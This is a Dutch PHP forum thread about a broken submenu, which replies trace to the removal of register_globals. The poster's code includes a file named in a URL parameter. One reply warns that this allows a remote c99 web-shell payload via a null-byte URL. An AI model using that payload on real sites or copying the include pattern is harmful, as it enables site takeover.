Submenu werkt niet meer, help!

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Software Developer C# / ASP .Net

Functie omschrijving Ben jij een software ontwikkelaar die bekend is met termen ASP .NET, C# en SQL? Lees dan snel verder! Voor een bedrijf binnen de agrarische sector zijn wij namelijk op zoek naar een zelfstandige, enthousiaste en proactieve Software Developer die open staat voor een afwisselende functie met veel uitdaging. Binnen deze organisatie ben jij als Software Developer samen met één andere collega verantwoordelijk voor de ontwikkeling en modificatie van het support en controle programma dat binnen dit bedrijf gebruikt wordt. Hierbij draag jij bij aan de vertaling van klantwensen naar effectieve softwareoplossingen. Daarnaast ben je verantwoordelijk voor: Schatten

Bekijk vacature »

C# developer

Sogeti is een organisatie met een goede werksfeer en zo min mogelijk hiërarchische verhoudingen. Ga je bij ons als C# Developer aan de slag? Dan werk je dagelijks met collega’s aan de mooiste IT-projecten. Deze snelgroeiende groep collega’s krijgt energie van hun vak en dat merk je op de werkvloer. Natuurlijk krijg jij de mogelijkheid je te certificeren. We organiseren regelmatig technische Meet-ups en doen we veel aan kennisdeling. Mede hierdoor zij wij dit jaar Microsoft Partner of the Year geworden. Sogetisten staan klaar voor elkaar, hebben lol met elkaar en daarmee behalen we de mooiste resultaten! Werken bij Sogeti

Bekijk vacature »

Junior Software Developer (HBO / WO)

Functie omschrijving Voor een leuke opdrachtgever zijn wij op zoek naar een Junior Software Developer! Sta jij aan het begin van je carrière en heb je net je HBO of WO-diploma in de richting van ICT of Techniek mogen ontvangen? En heb jij grote affiniteit met software development? Dan hebben wij bij Jelling IT Professionals de perfecte opdrachtgever in de omgeving van Hoofddorp. Binnen deze functie vervul je een onsite learning programma waarbij je aan de slag gaat met PHP en Laravel. Hierbij ben je voornamelijk werkzaam op verschillende klantlocaties en is het jouw taak om hun wensen en eisen

Bekijk vacature »

Database Developer

Functieomschrijving Heb jij ongeveer 3 jaar ervaring als Database Developer met MS SQL of een vergelijkbare database? Wil jij werken voor een ambitieuze werkgever in regio Tilburg waar jij volledig de mogelijkheid krijgt jezelf te ontwikkelen? Lees dan snel verder! Hoe ziet jouw takenpakket eruit? Je gaat projecten gedurende het hele proces begeleiden. Je sluit aan bij afspraken met klanten om hun processen helder te krijgen. Vervolgens voer jij het project uit en zorgt dat dit zo goed mogelijk verloopt; Je werkt aan nieuwe softwareoplossingen die de logistieke processen verbeteren of vernieuwen; Je houdt je bezig met het ontwikkelen van

Bekijk vacature »

.NET developer

Functie Als .NET developer start jij in een ontwikkelteam met 15 developers en twee testers. Samen zijn jullie verantwoordelijk voor financiële applicaties met meer dan 50.000 gebruikers. Een deel van het team is verantwoordelijk voor de webapplicaties van deze organisatie. Ook zijn er twee app ontwikkelaars werkzaam in het team die zich focussen op de mobiele applicatie. Als .NET ontwikkelaar ga jij aan de slag met de webapplicaties van deze organisatie. Hierbij maak jij o.a. gebruik van C# .NET, ASP.NET, T-SQL, Angular en TypeScript. De nadruk van jouw functie ligt wel op de backend van de applicatie. Wat jouw functie

Bekijk vacature »

Front-end Developer

Dit ga je doen Het onderhouden, ontwikkelen en testen van front-end software van diverse klant- en medewerkersapplicaties; Het ontwikkelen van maatwerk front-end oplossingen in Vue.js en participeren in een scrumteam; Mede-verantwoordelijk voor het begeleiden en coachen van drie junior front-end developers; Verantwoordelijk voor code-reviews en het opstellen van de juiste documentatie zoals userstories en API ontwerp; Participeren in diverse projecten t.b.v. optimalisatie van diverse applicaties; Het opzetten van API koppelingen met externe applicaties. Hier ga je werken Betreffende organisatie is gevestigd in de regio van Swifterbant en is al ruim 20 jaar lang bedreven in het ontwikkelen en aanbieden van

Bekijk vacature »

C# .NET Backend Developer HBO Javascript

Samengevat: Deze werkgever is een professionele speler op gebied van IT en E-Commerce. Wil jij werken voor een e-commerce platform? Heb je ervaring met C#, Javascript en Scrum? Vaste baan: C# .NET Developer Backend E-Commerce 3.400 - 4.500 Backend Developer Wij ontwikkelen software voor E-Commerce toepassingen. Ons eigen Content Management systeem biedt een integrale oplossing met diverse ERP software. Onze systemen zijn vaak complex en omvangrijk en draaien bij grote organisaties. Maar ook kleine ondernemingen hebben steeds vaker behoefte aan een vlekkeloos werkende E-Commerce oplossing. Zij bieden een uitdagende werkomgeving met gezellige collega's. Je krijgt veel vrijheid en er is

Bekijk vacature »

Ambitieuze medior developer

Wat je gaat doen: Heb jij al een paar jaar ervaring als developer maar wil jij naar the next level? In ons NextLevelDev Programma helpen wij jou om de volgende stap te zetten: een mooi programma aan trainingen op het gebied van Java, hippe frameworks, Agile/Scrum, OCP-certificering en optioneel: andere JVM-talen als Kotlin en Scala; Cloud (AWS, Azure, GCP) Soc Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun

Bekijk vacature »

Java Developer / Sociaal domein

Dit ga je doen Nieuwbouw en doorontwikkeling; Beheer en wanneer nodig onderhoud; Bijdrage leveren in het functioneel- en technisch ontwerptraject; Analyseren van productie verstoringen; Meedenken over vernieuwingen en verbeteringen. Hier ga je werken De organisatie waar jij komt te werken focust zich op software development met een maatschappelijk tintje. De afdeling software ontwikkeling bestaat uit vijf verschillende scrum teams, met allen hun eigen focus gebied. Zo zijn er een aantal teams die zich focussen op specifieke applicaties, maar is er ook een team gericht op projecten. Binnen de organisatie staat innovatie en kwaliteit voorop. Een aantal applicaties draait nog op

Bekijk vacature »

Full stack .NET developer Microsoft 365

Wat ga je doen als Full stack .NET developer Microsoft 365? Je stelt je op als sparringpartner voor het team en PO over toekomstige functionaliteiten, architectuur en mogelijke nieuwe producten. Je bent mede-verantwoordelijk voor het vertalen en omzetten van een user story in een passend technisch design. Je implementeert functionaliteiten op basis van een technisch design en user story. Je bent mede-verantwoordelijk voor het beheer van Azure DevOps, waaronder het beheer van GIT, Build Pipelines, Release Pipelines en geautomatiseerde testen. Hier herken jij jezelf in Hbo werk- en denkniveau of hoger aangevuld met relevante certificeringen en/of cursussen; Minimaal 3 jaar

Bekijk vacature »

Java (Java EE) Developer

In het kort Werken als Java developer betekent werken aan complexe IT projecten bij onder meer een internationaal containeroverslag bedrijf. Zo sturen we apparaten en eindgebruikers aan d.m.v. onze custom-made software oplossing, die dagelijkse vele duizenden containers verwerkt. Denk aan systemen die volautomatische kranen aansturen en op afstand bedienen, de volledige afhandeling van containernummerherkenning bij het laden en lossen van zeeschepen of het tonen van instructies aan de chauffeurs van ruim 300 straddle carriers. En dat allemaal redundant, robuust en in een dynamische 24/7 omgeving! Jij versterkt ons ontwikkelteam en gaat aan de slag met oa. Java i.c.m. Spring (Boot),

Bekijk vacature »

Front end developer Zorgplatform

Functie Jij als Front end ontwikkelen zult komen te werken samen met 1 PHP ontwikkelaar, 1 Python developer en een flexibele schil aan ontwikkelaars . Samen ga je ervoor zorgen dat de huidige producten doorontwikkeld worden. De Marketplace is geschreven in PHP Laravel en in de front end React. De roostersoftware is ontwikkeld in Python in combinatie met React in de front end. Jij zult als Front ender dus voornamelijk bezig zijn met het verbeteren van onze interfaces op onze verschillende producten. Momenteel ligt de uitdaging in het feit dat de roostersoftware breder schaalbaar moet worden zodat het voor meerdere

Bekijk vacature »

Typescript Developer / Cloud platform

Dit ga je doen (Door)Ontwikkelen van het cloud platform; (Door)Ontwikkelen van microservices; Bouwen van nieuwe functionaliteiten; Verbeteringen aandragen voor het cloud platform; Sparren met de business. Hier ga je werken Onze opdrachtgever, gevestigd in regio Eindhoven, levert een compleet dienstenpakket op het gebied van IT. Zij pakken verschillende (complexe) vraagstukken van grote organisaties op. De sfeer intern is gezellig en informeel. Men houdt van hard werken maar gezelligheid door middel van een borrel of gezamenlijke lunch komt er veel voor. Als Typescript ontwikkelaar word je onderdeel van het team gericht op de (door)ontwikkeling van hun eigen cloud platform welke wordt

Bekijk vacature »

Front-end Developer

Onze klant is sinds 2 jaar actief als adviseur en bemiddelaar in de verzekeringsmarkt. Sindsdien proberen zij deze slapende markt flink wakker te schudden. Dit willen zij doen door het bouwen van slimme vergelijkers op hun eigen website en die van partners. Het bedrijf wil continu voorop lopen, zodat consumenten eenvoudig de verzekeringen kunnen vinden die het beste bij ze past. Functieomschrijving Als Front-end Developer werk je aan vergelijkingsmodules die consumenten dagelijks gebruiken bij het vergelijken en afsluiten van verzekeringen. Je vindt het leuk om samen te werken met de product owner, bestaande modules te verbeteren en nieuwe vergelijkers "from

Bekijk vacature »

Airport Developer / System engineer

De functie Als onze nieuwe Airport Developer / System Engineer is je doel om uit nieuwbouw- en onderhoudsprojecten maximale waarde te creëren voor Schiphol Group en haar stakeholders. Vanuit je visie en expertise, maar ook (technologische) ontwikkelingen, wetgeving en beleid vertaal je klantwensen naar een gedegen programma van eisen. In de planontwikkelingsfase werk je nauw samen met Plan Ontwikkelaars om je kennis in te brengen ten behoeve van de kwaliteit van het investeringsvoorstel. Je overlegt met diverse partijen, stelt de vraag achter de vraag en verbindt zo de belangen van de luchthaven, proceseigenaar en asseteigenaar om tot een gedragen ontwikkelopgave

Bekijk vacature »
Am MM

Am MM

17/08/2012 15:12:19
Quote Anchor link
Hallo,

Ik heb problemen met de submenu. Het heeft al jaren gewerkt zonder probleem, maar als ik nu op het menu klik dan verwacht ik 3 submenu's maar die verschijnen niet meer, verder heb ik ook niets aangepast in de afgelopen maanden, dus het komt ook niet door een aanpassing.
Hoe komt dat? Kan iemand mij helpen aub?
 
PHP hulp

PHP hulp

16/04/2024 11:22:13
 
- SanThe -

- SanThe -

17/08/2012 15:14:02
Quote Anchor link
Misschien dat er een update op de server is gedaan.
 
Am MM

Am MM

17/08/2012 15:14:41
Quote Anchor link
Dat zou kunnen, maar valt daardoor de submenu's weg? Wat kan ik nu zelf doen?
 
Marco PHPJunky

Marco PHPJunky

17/08/2012 15:19:56
Quote Anchor link
wat voor menu is het ?
wat gebruikt het menu ?
is het ergens afhankelijk van ?

voorbeeld:
als het een menu is dat afhankelijk/gemaakt is m.b.v. Jquery en je laad automatische de laatste nieuwe versie van Jquery kan het zijn dat daar misschien het probleem ligt.
 
Am MM

Am MM

17/08/2012 15:25:28
Quote Anchor link
Het is in PHP en werkt via Include. Hij is niet afhankelijk, iig niet van Jquery enz.

Hieronder een deel van het menu:

if($_GET['pagina'])
{
if(file_exists($_GET['pagina'].".php"))
{
INCLUDE($_GET['pagina'].".php");
}
else
{
include("Home.php");
}
}
else
{
INCLUDE("Home.php");
} ?>
</div>


................. En dan hier begint van de submenu:

else

if (($pagina == "Stichting") or ($pagina == "Doel") or ($pagina == "Bestuur")) {include('Stichting1.php');
 
- Ariën  -
Beheerder

- Ariën -

17/08/2012 15:28:01
Quote Anchor link
Ik zie geen submenu?
Waar komt $pagina vandaan?
Gewijzigd op 17/08/2012 15:28:36 door - Ariën -
 
Marco PHPJunky

Marco PHPJunky

17/08/2012 15:30:56
Quote Anchor link
sterker nog ik zie niet eens een menu...
Ik zie alleen een klein stukje voor het includeren van pagina's
 
Am MM

Am MM

17/08/2012 15:37:06
Quote Anchor link
Ah ik zie het is niet volledig....

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<?php include('top.php'); ?>

<tr>
<td rowspan="3" width="506" height="100%" valign="top">
<br />
<div id="" class="scroltable">
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
                 if($_GET['pagina'])  
                      {
  
                        if(file_exists($_GET['pagina'].".php"))  
                        {
  
                         INCLUDE($_GET['pagina'].".php");  
                        }
  
                        else  
                        {  
                         include("Home.php");  
                        }  
                      }
  
                      else  
                      {  
                    INCLUDE("Home.php");  
                      }
?>



<div class="submenu">
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
if (($pagina == "Stichting") or ($pagina == "Doel") or ($pagina == "Bestuur") or ($pagina == "Bestuursleden"))
{
include('Stichting1.php');
                            }

                                                   else
>>>>>>  dit gaat dan door voor andere submenu's.


Hier komt het gedeelte van de Top.php

<a href="?pagina=Home" class="menu">Home</a>
<a href="?pagina=Stichting" class="menu">Stichting</a>


Maargoed dit heeft altijd al gewerkt en ik vind het nu zo vaag dat de submenu'
s niet meer verschijnen.
Gewijzigd op 17/08/2012 16:01:02 door Am MM
 
- Ariën  -
Beheerder

- Ariën -

17/08/2012 16:06:13
Quote Anchor link
Wederom komt $pagina vanuit het niets.
Ik mag hopen dat je hiermee niet $_GET['pagina'] bedoelt. Want dat zou al ruim 10 jaar niet meer mogen werken.
 
Kris Peeters

Kris Peeters

17/08/2012 16:07:59
Quote Anchor link
ik kan alleen maar vaststellen dat $pagina nergens een waarde krijgt.

Het doet me iets vrezen: in php4 kon je gewone variabelen aanspreken met de url, alsof ze $_GET variabelen waren.

je kon iets als $pagina en $_GET['pagina'] door mekaar gebruiken (gezellige tijd voor hackers).

Grote wijsheid heeft ervoor gezorgd dat php5 dit niet meer doet.
Zou het dit kunnen zijn?

(Ik merk dat hier boven het zelfde wordt gevreesd)
Gewijzigd op 17/08/2012 16:25:05 door Kris Peeters
 
- Ariën  -
Beheerder

- Ariën -

17/08/2012 16:27:51
Quote Anchor link
In PHP 4.2.0 werd het voorbeeld met $pagina al onmogelijk gemaakt met de register_globals op 'off'.
En de releasedata daarvan was: Released: 22 April 2002. Ruim 10 jaar geleden....

Bovenaan de Changelog stond zelfs vermeld:
Quote:
ATTENTION!! register_globals defaults to 'off' now !!!
Gewijzigd op 17/08/2012 16:29:03 door - Ariën -
 
Olivier -

olivier -

17/08/2012 17:22:20
Quote Anchor link
eventjes....
wat nou als ik ga naar ?pagina=index
krijgen we dan een enorme crash?
en als ik ga naar www.shell.nl/c99.txt en dan in jou pagina ?pagina=http://www.shell.nl/c99.txt%00
en tadaaaa
een shell!
website gehackt jij niet bij.
 
Eddy E

Eddy E

17/08/2012 19:00:32
Quote Anchor link
Shell.nl is toch iets met olie?
 
Am MM

Am MM

17/08/2012 19:00:56
Quote Anchor link
Dus als ik het goed heb begrepen dan wordt $_GET['pagina'] niet meer gebruikt en het kan ook heel makkelijk geheckt worden.
Waarmee moet ik dit vervangen??? Of moet ik dit heel scherm anders aanpakken? Ik heb al jaren geen php meer gebruikt dus alles is nu heel vaag voor ij.
Alle help is welkom! Thanks!
 
- Ariën  -
Beheerder

- Ariën -

17/08/2012 19:40:24
Quote Anchor link
Eddy Erkelens op 17/08/2012 19:00:32:
Shell.nl is toch iets met olie?

Lekker belangrijk, het gaat om het voorbeeld. Dat er in dit geval onze belangrijke en bekende oliemaatschappij wordt bedoeld, is niet echt relevant.
Ze bedoelen hier een 'shell' mee in de vorm van hacken. Zie het als een groot PHP-controlepaneel om bestanden te beheren welke je via een zelf uit te zoeken uploadlek, op een site kan implementeren om deze vervolgens volledig over te kunnen nemen.

Toevoeging op 17/08/2012 19:41:41:

Olivier - op 17/08/2012 17:22:20:
eventjes....
wat nou als ik ga naar ?pagina=index
krijgen we dan een enorme crash?

gelukkig is er een set_time_limit() die standaard op 30 sec. staat, dus van een crash, en zelfs een grote crash kan je niet eens spreken.

Toevoeging op 17/08/2012 19:42:52:

Am MM op 17/08/2012 19:00:56:
Dus als ik het goed heb begrepen dan wordt $_GET['pagina'] niet meer gebruikt en het kan ook heel makkelijk geheckt worden.

Integendeel, die wordt juist wel gebruikt, maar $pagina niet meer. Vroeger was dit een variabele met een verborgen waarde voor GET-parameters, maar dat is sidns een decennium gelukkig niet meer zo.

Dus gebruik $_GET['pagina'] etc....
Gewijzigd op 17/08/2012 19:44:45 door - Ariën -
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.